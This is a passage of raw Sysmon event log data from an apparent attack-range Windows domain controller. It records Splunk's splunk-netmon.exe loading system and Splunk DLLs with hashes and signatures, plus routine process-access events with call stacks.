SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x800000000000000098653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.890{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7trueMicrosoft WindowsValid 734700x800000000000000098631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000098629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55trueMicrosoft WindowsValid 734700x800000000000000098628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECCtrueMicrosoft WindowsValid 734700x800000000000000098627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000098625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 10341000x800000000000000098622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52trueSplunk, Inc.Valid 10341000x800000000000000098617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:46.874{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0B2-6294-300B-000000005502}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 